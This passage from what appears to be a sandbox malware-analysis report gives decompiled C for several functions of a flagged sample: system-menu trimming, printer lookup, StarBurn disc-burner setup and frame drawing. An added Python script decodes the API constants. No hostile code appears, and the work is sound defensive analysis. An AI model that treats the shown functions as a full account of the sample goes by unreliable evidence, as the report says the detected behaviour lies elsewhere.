      				struct HMENU__* _t48;
      
      				_t27 =  *((intOrPtr*)(_a4 - 4));
      				if( *((char*)(_t27 + 0x229)) != 0) {
      					_t27 =  *((intOrPtr*)(_a4 - 4));
      					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
      						_t27 =  *((intOrPtr*)(_a4 - 4));
      						if( *((char*)(_t27 + 0x22f)) != 1) {
      							_t48 = GetSystemMenu(E0044B158( *((intOrPtr*)(_a4 - 4))), 0);
      							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
      								DeleteMenu(_t48, 0xf130, 0);
      								DeleteMenu(_t48, 7, 0x400);
      								DeleteMenu(_t48, 5, 0x400);
      								DeleteMenu(_t48, 0xf030, 0);
      								DeleteMenu(_t48, 0xf020, 0);
      								DeleteMenu(_t48, 0xf000, 0);
      								return DeleteMenu(_t48, 0xf120, 0);
      							}
      							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
      								EnableMenuItem(_t48, 0xf020, 1);
      							}
      							_t27 =  *((intOrPtr*)(_a4 - 4));
      							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
      								return EnableMenuItem(_t48, 0xf030, 1);
      							}
      						}
      					}
      				}
      				return _t27;
      			}

Statement addresses: 0x0045fd0b to 0x0045fdfc

      APIs
      • GetSystemMenu.USER32(00000000,00000000), ref: 0045FD4F
      • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 0045FD6D
      • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045FD7A
      • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045FD87
      • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045FD94
      • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0045FDA1
      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0045FDAE
      • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0045FDBB
      • EnableMenuItem.USER32 ref: 0045FDD9
      • EnableMenuItem.USER32 ref: 0045FDF5
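The argument lists the sandbox prints for CreateFileA, SetFilePointer and GetStdHandle in the E00403080 entry and for DeleteMenu and EnableMenuItem here are raw stack values, and Joe Sandbox prints more slots than the API takes, so everything past the API's arity is stack residue rather than an argument. The decoder below is an added example, not part of the report. It parses those lines (copied from this page, plus one EnableMenuItem line constructed from the C listing above because the report printed that call without arguments) and names the constants from the public Win32 SDK headers: GENERIC_READ and OPEN_EXISTING for the file open, FILE_END for the seek, STD_OUTPUT_HANDLE for the sign-extended 000000F5, and the SC_* system-menu ids and MF_BYPOSITION for the menu calls. The tables cover only the constants these calls use.

```python
import re

# "APIs" lines copied from this report (E00403080 and E0045FD04 entries); the
# EnableMenuItem line with arguments is constructed from the C listing because the
# report printed that call without them. Only the leading arity slots are decoded.
REPORT_LINES = [
    "• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00403108",
    "• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403192",
    "• GetStdHandle.KERNEL32(000000F5), ref: 004031DB",
    "• DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 0045FD6D",
    "• DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0045FD7A",
    "• EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 0045FDD9",   # constructed
    "• EnableMenuItem.USER32 ref: 0045FDF5",
]

LINE_RE = re.compile(
    r"(?:•\s*)?(?P<api>\w+)\.(?P<mod>[\w.]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Win32 constants from the public SDK headers, limited to what these calls use.
ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
          (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRS = [(0x1, "FILE_ATTRIBUTE_READONLY"), (0x2, "FILE_ATTRIBUTE_HIDDEN"),
         (0x80, "FILE_ATTRIBUTE_NORMAL"), (0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"),
         (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE"), (0x40000000, "FILE_FLAG_OVERLAPPED")]
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}
STD_HANDLE = {-10: "STD_INPUT_HANDLE", -11: "STD_OUTPUT_HANDLE", -12: "STD_ERROR_HANDLE"}
SC = {0xF000: "SC_SIZE", 0xF010: "SC_MOVE", 0xF020: "SC_MINIMIZE", 0xF030: "SC_MAXIMIZE",
      0xF060: "SC_CLOSE", 0xF120: "SC_RESTORE", 0xF130: "SC_TASKLIST"}
MENU_FLAGS = [(0x400, "MF_BYPOSITION"), (0x1, "MF_GRAYED"), (0x2, "MF_DISABLED")]


def flags(value, table):
    """Name every bit of `value` listed in `table`; leftover bits are kept as hex."""
    names = [name for bit, name in table if value & bit]
    rest = value & ~sum(bit for bit, _ in table) & 0xFFFFFFFF
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else "0"


def parse_line(line):
    """Split one report line into (api, module, args, ref); '?' slots become None."""
    m = LINE_RE.search(line)
    if not m:
        raise ValueError("not an API line: " + line)
    raw = [a for a in (m.group("args") or "").split(",") if a]
    args = [None if a == "?" else int(a, 16) for a in raw]
    return m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)


def decode_call(api, args):
    """Return {parameter: decoded constant} for the arguments tabled above."""
    out = {}
    if api == "CreateFileA" and len(args) >= 6:
        out["dwDesiredAccess"] = flags(args[1], ACCESS)
        out["dwShareMode"] = flags(args[2], SHARE)
        out["dwCreationDisposition"] = DISPOSITION.get(args[4], hex(args[4]))
        out["dwFlagsAndAttributes"] = flags(args[5], ATTRS)
    elif api == "SetFilePointer" and len(args) >= 4:
        out["dwMoveMethod"] = MOVE_METHOD.get(args[3], hex(args[3]))
    elif api == "GetStdHandle" and args:
        # The caller pushed a sign-extended imm8 (push -11); the report shows only the
        # low byte as 000000F5, so widen 8-bit and 32-bit values to a signed int first.
        v = args[0]
        if 0x80 <= v <= 0xFF:
            v -= 0x100
        elif v >= 0x80000000:
            v -= 1 << 32
        out["nStdHandle"] = STD_HANDLE.get(v, str(v))
    elif api in ("DeleteMenu", "EnableMenuItem") and len(args) >= 3:
        out["uFlags"] = flags(args[2], MENU_FLAGS) if args[2] else "MF_BYCOMMAND"
        if args[2] & 0x400:
            out["uPosition"] = "item #%d" % args[1]           # positional (separators 7 and 5)
        else:
            out["uPosition"] = SC.get(args[1], hex(args[1]))  # SC_* system-menu command
    return out


def decode_report(lines):
    """Decode every line to (ref, api, decoded); calls printed without arguments give {}."""
    rows = []
    for line in lines:
        api, _mod, args, ref = parse_line(line)
        rows.append((ref, api, decode_call(api, args)))
    return rows


if __name__ == "__main__":
    for ref, api, decoded in decode_report(REPORT_LINES):
        print("%08X %-15s %s" % (ref, api, decoded))
```

Run as a script it prints one decoded row per line. On this sample the CreateFileA is a read-only, read-shared open of an existing file, and the DeleteMenu sequence removes SC_TASKLIST, two separators by position, SC_MAXIMIZE, SC_MINIMIZE, SC_SIZE and SC_RESTORE from the window's system menu, which is the standard way a dialog-style frame trims its menu and not a persistence or injection primitive; the calls worth chasing for the detections in the summary live elsewhere in the report.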
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Menu$Delete$EnableItem$System
      • String ID:
      • API String ID: 3985193851-0
      • Opcode ID: 97afc092d09705b864c06d5793c85b5a4f4c72f55ac9179b8f4353c0c5274059
      • Instruction ID: f08292b1e9864850543270e70e592a8f622cef3bd0f58cf99fd487d021676499
      • Opcode Fuzzy Hash: 97afc092d09705b864c06d5793c85b5a4f4c72f55ac9179b8f4353c0c5274059
      • Instruction Fuzzy Hash: CF2150707843447AE320A628CC9EF997BD99B1471AF1440B5FA057F6D3C6BCFA88860D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 47%
      			E0042FA54(intOrPtr __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
      				intOrPtr _v8;
      				char _v12;
      				char _v16;
      				char _v20;
      				intOrPtr _v24;
      				intOrPtr* _v28;
      				char _v1052;
      				char _v1056;
      				char _v1060;
      				char _v1064;
      				char* _t44;
      				void* _t69;
      				void* _t70;
      				void* _t78;
      				long _t88;
      				intOrPtr _t90;
      				void* _t95;
      				void* _t97;
      				void* _t102;
      				intOrPtr _t107;
      				intOrPtr _t113;
      				intOrPtr* _t116;
      				void* _t119;
      				void* _t120;
      				void* _t122;
      				void* _t123;
      				intOrPtr _t124;
      
      				_t117 = __esi;
      				_t115 = __edi;
      				_t97 = __ecx;
      				_t94 = __ebx;
      				_t122 = _t123;
      				_t124 = _t123 + 0xfffffbdc;
      				_push(__ebx);
      				_push(__esi);
      				_push(__edi);
      				_t105 = 0;
      				_v1064 = 0;
      				_v1060 = 0;
      				_v1056 = 0;
      				_v8 = __eax;
      				_push(_t122);
      				_push(0x42fc31);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t124;
      				_v12 = 0;
      				_v16 = 0;
      				_push( &_v16);
      				_t44 =  &_v12;
      				_push(_t44);
      				_push(0);
      				_push(0);
      				_push(5);
      				_push(0);
      				_push(1);
      				L0042ED00();
      				if(_t44 == 0 && GetLastError() != 0x7a) {
      					_t88 = GetLastError();
      					_t127 = _t88 - 0x7b;
      					if(_t88 != 0x7b) {
      						E0040E218(__ebx, _t97, __edi, __esi);
      					} else {
      						_t105 =  &_v1056;
      						_t90 =  *0x48f62c; // 0x423d20
      						E00406A3C(_t90, _t97,  &_v1056);
      						E0042EE58(_v1056);
      					}
      				}
      				_v28 = E00408C10(_v12, _t97, _t105, _t127);
      				_push(_t122);
      				_push(0x42fbf1);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t124;
      				_push( &_v16);
      				_push( &_v12);
      				_push(_v12);
      				_push(_v28);
      				_push(5);
      				_push(0);
      				_push(1);
      				L0042ED00();
      				if(_v16 <= 0) {
      					GetProfileStringA("windows", "device", 0x42fc40,  &_v1052, 0x3ff);
      					_v20 =  &_v1052;
      					_v24 = E0042EE08( &_v20);
      				} else {
      					_v24 =  *_v28;
      				}
      				_t116 = E0042F804(_v8, _t94, _t115, _t117);
      				_t119 =  *((intOrPtr*)( *_t116 + 0x14))() - 1;
      				if(_t119 < 0) {
      					L13:
      					__eflags = 0;
      					_pop(_t107);
      					 *[fs:eax] = _t107;
      					_push(0x42fbf8);
      					return E00402AFC(_v28);
      				} else {
      					_t120 = _t119 + 1;
      					_t95 = 0;
      					while(1) {
      						_push( *((intOrPtr*)( *((intOrPtr*)( *_t116 + 0x18))() + 8)));
      						E00404C38( &_v1060, _v24);
      						_pop(_t69);
      						_t70 = E00408EE4(_t69, _v1060, 0);
      						_t131 = _t70;
      						if(_t70 != 0) {
      							break;
      						}
      						_t95 = _t95 + 1;
      						_t120 = _t120 - 1;
      						__eflags = _t120;
      						if(_t120 != 0) {
      							continue;
      						} else {
      							goto L13;
      						}
      						goto L15;
      					}
      					_t96 =  *((intOrPtr*)( *_t116 + 0x18))();
      					_push(E00404F00( *((intOrPtr*)(_t72 + 0xc))));
      					_push(E00404F00( *((intOrPtr*)(_t72 + 4))));
      					_t78 = E00404F00( *((intOrPtr*)(_t96 + 8)));
      					_pop(_t102);
      					E0042F52C(_v8, _t96, _t102, _t78, _t116, _t120, _t131);
      					E0040447C();
      					_t113 = 0;
      					 *[fs:eax] = _t113;
      					_push(0x42fc38);
      					return E00404A64( &_v1064, 3);
      				}
      				L15:
      			}

Statement addresses: 0x0042fa54 to 0x0042fc30

      APIs
      • 73802130.WINSPOOL.DRV(00000001,00000000,00000005,00000000,00000000,?,?,00000000,0042FC31,?,00000000,?,?,?,0042F7FC), ref: 0042FAA1
      • GetLastError.KERNEL32(00000001,00000000,00000005,00000000,00000000,?,?,00000000,0042FC31,?,00000000,?,?,?,0042F7FC), ref: 0042FAAA
      • GetLastError.KERNEL32(00000001,00000000,00000005,00000000,00000000,?,?,00000000,0042FC31,?,00000000,?,?,?,0042F7FC), ref: 0042FAB4
        • Part of subcall function 00406A3C: LoadStringA.USER32 ref: 00406A6E
      • 73802130.WINSPOOL.DRV(00000001,00000000,00000005,00000000,?,?,?,00000000,0042FBF1,?,00000001,00000000,00000005,00000000,00000000,?), ref: 0042FB0F
      • GetProfileStringA.KERNEL32(windows,device,0042FC40,?,000003FF), ref: 0042FB3F
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: 73802130.ErrorLastString$LoadProfile
      • String ID: =B$device$windows
      • API String ID: 2222313407-4087766923
      • Opcode ID: 762da815830e6ad0f2b2987def458d100c3172ad45ac9bc41ba0ec8fd2994b88
      • Instruction ID: 823ffd02ebeb7dd9bdfae32b8f011756aee21cb2ea758bb367f733c8e6de3ac0
      • Opcode Fuzzy Hash: 762da815830e6ad0f2b2987def458d100c3172ad45ac9bc41ba0ec8fd2994b88
      • Instruction Fuzzy Hash: 47517471B002189FDB10DF66DC42B9EB7F8EB48704FA084BBF504E7291DA78AD458B59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 42%
      			E004816FC(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
      				char _v8;
      				char _v12;
      				intOrPtr _v16;
      				char _v20;
      				intOrPtr _v24;
      				char _v28;
      				char _v32;
      				char _v36;
      				char _v40;
      				char _v44;
      				char _v48;
      				char _v52;
      				intOrPtr _t64;
      				char _t72;
      				intOrPtr _t86;
      				intOrPtr _t97;
      				char _t109;
      				intOrPtr _t121;
      				void* _t136;
      				void* _t139;
      
      				_t146 = __fp0;
      				_t134 = __edi;
      				_push(__ebx);
      				_v36 = 0;
      				_v40 = 0;
      				_v44 = 0;
      				_v48 = 0;
      				_v52 = 0;
      				_v8 = 0;
      				_t136 = __eax;
      				_push(_t139);
      				_push(0x4818f4);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t139 + 0xffffffd0;
      				E00481A5C(__eax);
      				if( *((intOrPtr*)(_t136 + 0xd8)) == 0) {
      					_t64 =  *0x490c50; // 0x0
      					E0047FD7C(_t64, __ebx, 0, "CdvdBurnerGrabber_Create (before create)", __edi, _t136, __fp0);
      					if( *((char*)(_t136 + 0x18)) != 1) {
      						_push(0);
      						_push(E00404F00( *((intOrPtr*)(_t136 + 0xc0))));
      						_push(0);
      						_push(E0047C854);
      						_push(_t136 + 0x4e8);
      						_push(_t136 + 0xe4);
      						_push(0x400);
      						_push(_t136 + 0xe8);
      						_t72 = _t136 + 0xd8;
      						_push(_t72);
      						L00465E04();
      						 *((char*)(_t136 + 0xe0)) = _t72;
      					} else {
      						_push(0);
      						_push( *((intOrPtr*)(_t136 + 0xc)));
      						_push( *((intOrPtr*)(_t136 + 0xb)));
      						_push( *((intOrPtr*)(_t136 + 0xa)));
      						_push( *((intOrPtr*)(_t136 + 9)));
      						_push(0);
      						_push(E0047C854);
      						_push(_t136 + 0x4e8);
      						_push(_t136 + 0xe4);
      						_push(0x400);
      						_push(_t136 + 0xe8);
      						_t109 = _t136 + 0xd8;
      						_push(_t109);
      						L00465DFC();
      						 *((char*)(_t136 + 0xe0)) = _t109;
      					}
      					_t111 =  *((intOrPtr*)(_t136 + 0xe0));
      					if( *((intOrPtr*)(_t136 + 0xe0)) == 0) {
      						_push("CdvdBurnerGrabber_Create (after create): PortID:");
      						E004091E4( &_v40);
      						_push(_v40);
      						_push(0x4819d4);
      						_push("BusID:");
      						E004091E4( &_v44);
      						_push(_v44);
      						_push(0x4819d4);
      						_push("TargetID:");
      						E004091E4( &_v48);
      						_push(_v48);
      						_push(0x4819d4);
      						_push("LUN:");
      						E004091E4( &_v52);
      						_push(_v52);
      						E00404DC0();
      						_t86 =  *0x490c50; // 0x0
      						E0047FD7C(_t86, _t111, 0, _v36, _t134, _t136, _t146);
      					} else {
      						_v32 = 0;
      						_v28 = 0;
      						_v24 =  *((intOrPtr*)(_t136 + 0xe4));
      						_v20 = 0;
      						_v16 = _t136 + 0xe8;
      						_v12 = 6;
      						E0040A164("StarBurn_CdvdBurnerGrabber_Create() failed, exception %d, status %d, text \"%s\"", 2,  &_v32,  &_v8);
      						E00404A94(_t136 + 4, _v8);
      						_t97 =  *0x490c50; // 0x0
      						E0047FD7C(_t97, _t111, 0,  *((intOrPtr*)(_t136 + 4)), _t134, _t136, _t146);
      						E0040CBEC( *((intOrPtr*)(_t136 + 4)), 1);
      						E004043D0();
      					}
      				}
      				_pop(_t121);
      				 *[fs:eax] = _t121;
      				_push(0x4818fb);
      				E00404A64( &_v52, 5);
      				return E00404A40( &_v8);
			}

      Address column (one entry per decompiled statement, in decompilation order; the side-by-side alignment of the original layout is not preserved): 0x004816fc, 0x004816fc, 0x00481702, 0x00481706, 0x00481709, 0x0048170c, 0x0048170f, 0x00481712, 0x00481715, 0x00481718, 0x0048171c, 0x0048171d, 0x00481722, 0x00481725, 0x0048172a, 0x00481736, 0x00481743, 0x00481748, 0x00481751, 0x0048179b, 0x004817a8, 0x004817a9, 0x004817b0, 0x004817b7, 0x004817be, 0x004817bf, 0x004817ca, 0x004817cb, 0x004817d1, 0x004817d2, 0x004817d7, 0x00481753, 0x00481753, 0x00481758, 0x0048175c, 0x00481760, 0x00481764, 0x00481765, 0x0048176c, 0x00481773, 0x0048177a, 0x0048177b, 0x00481786, 0x00481787, 0x0048178d, 0x0048178e, 0x00481793, 0x00481793, 0x004817dd, 0x004817e5, 0x00481852, 0x0048185f, 0x00481864, 0x00481867, 0x0048186c, 0x00481879, 0x0048187e, 0x00481881, 0x00481886, 0x00481893, 0x00481898, 0x0048189b, 0x004818a0, 0x004818ad, 0x004818b2, 0x004818bd, 0x004818c7, 0x004818cc, 0x004817e7, 0x004817ef, 0x004817f2, 0x004817fc, 0x004817ff, 0x00481809, 0x0048180c, 0x0048181d, 0x00481828, 0x00481832, 0x00481837, 0x00481846, 0x0048184b, 0x0048184b, 0x004817e5, 0x004818d3, 0x004818d6, 0x004818d9, 0x004818e6, 0x004818f3

      APIs
        • Part of subcall function 00481A5C: StarBurn_Destroy.STARBURN(00000000,?,0048172F,00000000,004818F4), ref: 00481A87
      • StarBurn_CdvdBurnerGrabber_Create.STARBURN(00000000,00000000,00000400,00000000,?,Function_0007C854,00000000,?,?,?,?,00000000,00000000,004818F4), ref: 0048178E
      • StarBurn_CdvdBurnerGrabber_CreateEx.STARBURN(00000000,00000000,00000400,00000000,?,Function_0007C854,00000000,00000000,00000000,00000000,004818F4), ref: 004817D2
      Strings
      • BusID:, xrefs: 0048186C
      • TargetID:, xrefs: 00481886
      • LUN:, xrefs: 004818A0
      • CdvdBurnerGrabber_Create (before create), xrefs: 0048173E
      • StarBurn_CdvdBurnerGrabber_Create() failed, exception %d, status %d, text "%s", xrefs: 00481818
      • CdvdBurnerGrabber_Create (after create): PortID:, xrefs: 00481852
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_Star$BurnerCdvdCreateGrabber_$Destroy
      • String ID: BusID:$CdvdBurnerGrabber_Create (after create): PortID:$CdvdBurnerGrabber_Create (before create)$LUN:$StarBurn_CdvdBurnerGrabber_Create() failed, exception %d, status %d, text "%s"$TargetID:
      • API String ID: 897743036-257372085
      • Opcode ID: dbd705ae994ed7c30d444fd035a5b039dcbe4b66d8fedb13bb96a1e67ebe14bd
      • Instruction ID: bca3912076bf07049f71ac61b04f681004821ad8420b748fe0bb8cbc6c77e5c2
      • Opcode Fuzzy Hash: dbd705ae994ed7c30d444fd035a5b039dcbe4b66d8fedb13bb96a1e67ebe14bd
      • Instruction Fuzzy Hash: 075181706046449ED711EBA5C851BDFB7FCAF48304F10883BE19AF7291D778A9058B68
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 93%
      			E00438258(intOrPtr* __eax, void* __ecx) {
      				intOrPtr _v8;
      				struct tagRECT _v24;
      				intOrPtr _v28;
      				intOrPtr _v32;
      				intOrPtr _v36;
      				char _v40;
      				void* __edi;
      				void* __ebp;
      				void* _t85;
      				intOrPtr* _t150;
      				void* _t152;
      				void* _t158;
      				intOrPtr _t165;
      				void* _t181;
      				signed int _t183;
      				void* _t186;
      				void* _t188;
      				void* _t190;
      				intOrPtr _t191;
      
      				_t152 = __ecx;
      				_t188 = _t190;
      				_t191 = _t190 + 0xffffffdc;
      				_push(_t181);
      				_t150 = __eax;
      				_t85 = E004492C0(__eax, _t158);
      				_t193 =  *((char*)(_t150 + 0x165));
      				if( *((char*)(_t150 + 0x165)) == 0) {
      					return _t85;
      				} else {
      					_v8 = E00426448(_t152, 1);
      					 *[fs:eax] = _t191;
      					E00443504(_v8, _t150);
      					 *((intOrPtr*)( *_t150 + 0x44))( *[fs:eax], 0x438481, _t188);
      					E004262F8( *((intOrPtr*)(_v8 + 0x14)),  *_t150,  *((intOrPtr*)(_t150 + 0x70)), _t181, _t188, _t193);
      					E004266D8(_v8,  &_v24);
      					InflateRect( &_v24, 0xffffffff, 0xffffffff);
      					E004266D8(_v8,  &_v24);
      					if( *((char*)(_t150 + 0x165)) != 0) {
      						_t186 = 0;
      						if( *((char*)(_t150 + 0x163)) != 0) {
      							_t186 = 0 +  *((intOrPtr*)(_t150 + 0x168));
      						}
      						if( *((char*)(_t150 + 0x164)) != 0) {
      							_t186 = _t186 +  *((intOrPtr*)(_t150 + 0x168));
      						}
      						_t199 = _t186;
      						if(_t186 == 0) {
      							 *((intOrPtr*)( *_t150 + 0x44))();
      							E004262F8( *((intOrPtr*)(_v8 + 0x14)),  *_t150,  *((intOrPtr*)(_t150 + 0x70)), _t181, _t188, _t199);
      							E004266D8(_v8,  &_v24);
      							InflateRect( &_v24, 0xffffffff, 0xffffffff);
      							E004266D8(_v8,  &_v24);
      						}
      						 *((intOrPtr*)( *_t150 + 0x44))();
      						E004442C8(_t150,  &_v40);
      						_t183 = GetWindowLongA(E00426B00(_v8), 0xfffffff0);
      						if(( *(_t150 + 0x162) & 0x00000001) != 0) {
      							_v40 = _v40 - _t186;
      						}
      						if(( *(_t150 + 0x162) & 0x00000002) != 0) {
      							_v36 = _v36 - _t186;
      						}
      						if(( *(_t150 + 0x162) & 0x00000004) != 0) {
      							_v32 = _v32 + _t186;
      						}
      						if((_t183 & 0x00200000) != 0) {
      							_v32 = _v32 + GetSystemMetrics(0x14);
      						}
      						if(( *(_t150 + 0x162) & 0x00000008) != 0) {
      							_v28 = _v28 + _t186;
      						}
      						if((_t183 & 0x00100000) != 0) {
      							_v28 = _v28 + GetSystemMetrics(0x15);
      						}
      						DrawEdge(E00426B00(_v8),  &_v24,  *0x0048E8D4 |  *0x0048E8E4,  *0x0048E8F4 |  *0x0048E904 | 0x00002000);
      						_v24.left = _v24.right - GetSystemMetrics(0xa) - 1;
      						if(E00436A04(_t150) == 0) {
      							DrawFrameControl(E00426B00(_v8),  &_v24, 3, 0x4005);
      						} else {
      							DrawFrameControl(E00426B00(_v8),  &_v24, 3, 0x4005);
      						}
      					}
      					_pop(_t165);
      					 *[fs:eax] = _t165;
      					_push(0x438488);
      					return E00403BF0(_v8);
      				}
			}

      Address column (one entry per decompiled statement, in decompilation order; the side-by-side alignment of the original layout is not preserved): 0x00438258, 0x00438259, 0x0043825b, 0x00438260, 0x00438261, 0x00438265, 0x0043826a, 0x00438271, 0x0043848e, 0x00438277, 0x00438283, 0x00438291, 0x00438299, 0x004382a5, 0x004382b1, 0x004382bc, 0x004382c9, 0x004382d4, 0x004382e0, 0x004382e6, 0x004382ef, 0x004382f1, 0x004382f1, 0x004382fe, 0x00438300, 0x00438300, 0x00438306, 0x00438308, 0x00438311, 0x0043831d, 0x00438328, 0x00438335, 0x00438340, 0x00438340, 0x0043834c, 0x00438354, 0x00438369, 0x00438372, 0x00438374, 0x00438374, 0x0043837e, 0x00438380, 0x00438380, 0x0043838a, 0x0043838c, 0x0043838c, 0x00438395, 0x0043839e, 0x0043839e, 0x004383a8, 0x004383aa, 0x004383aa, 0x004383b3, 0x004383bc, 0x004383bc, 0x00438417, 0x00438429, 0x00438435, 0x00438466, 0x00438437, 0x0043844b, 0x0043844b, 0x00438435, 0x0043846d, 0x00438470, 0x00438473, 0x00438480, 0x00438480

      APIs
        • Part of subcall function 00426448: RtlInitializeCriticalSection.KERNEL32(00429B3C,00429B04,?,00000001,00429C9A,?,?,?,0042AF0D,?,?,0042AD2C,?,0000000E,00000000,?), ref: 00426468
        • Part of subcall function 004266D8: FrameRect.USER32 ref: 00426700
      • InflateRect.USER32(?,000000FF,000000FF), ref: 004382C9
      • InflateRect.USER32(?,000000FF,000000FF), ref: 00438335
      • GetWindowLongA.USER32 ref: 00438364
      • GetSystemMetrics.USER32 ref: 00438399
      • GetSystemMetrics.USER32 ref: 004383B7
      • DrawEdge.USER32(00000000,?,00000000,00000008), ref: 00438417
      • GetSystemMetrics.USER32 ref: 0043841E
      • DrawFrameControl.USER32 ref: 0043844B
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MetricsRectSystem$DrawFrameInflate$ControlCriticalEdgeInitializeLongSectionWindow
      • String ID:
      • API String ID: 1475008941-0
      • Opcode ID: 367d3d62cdd68b0dc0c134d88507c1d988ae4613bfd9ea01ec77b41b4e45260e
      • Instruction ID: a05311cb189b6b3b8744b24664c8cde6b5f5e5c603b090cd8f13cc16a4a2e353
      • Opcode Fuzzy Hash: 367d3d62cdd68b0dc0c134d88507c1d988ae4613bfd9ea01ec77b41b4e45260e
      • Instruction Fuzzy Hash: B861D530A002059BDB00EF65CC85BDEB7F5AF49304F5401BABC04BB296DB39AE05CB65
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00444544(intOrPtr* __eax, int __ecx, int __edx) {
      				char _t62;
      				signed int _t64;
      				signed int _t65;
      				signed char _t107;
      				intOrPtr _t113;
      				intOrPtr _t114;
      				int _t117;
      				intOrPtr* _t118;
      				int _t119;
      				int* _t121;
      
      				 *_t121 = __ecx;
      				_t117 = __edx;
      				_t118 = __eax;
      				if(__edx ==  *_t121) {
      					L29:
      					_t62 =  *0x4446f0; // 0x0
      					 *((char*)(_t118 + 0x98)) = _t62;
      					return _t62;
      				}
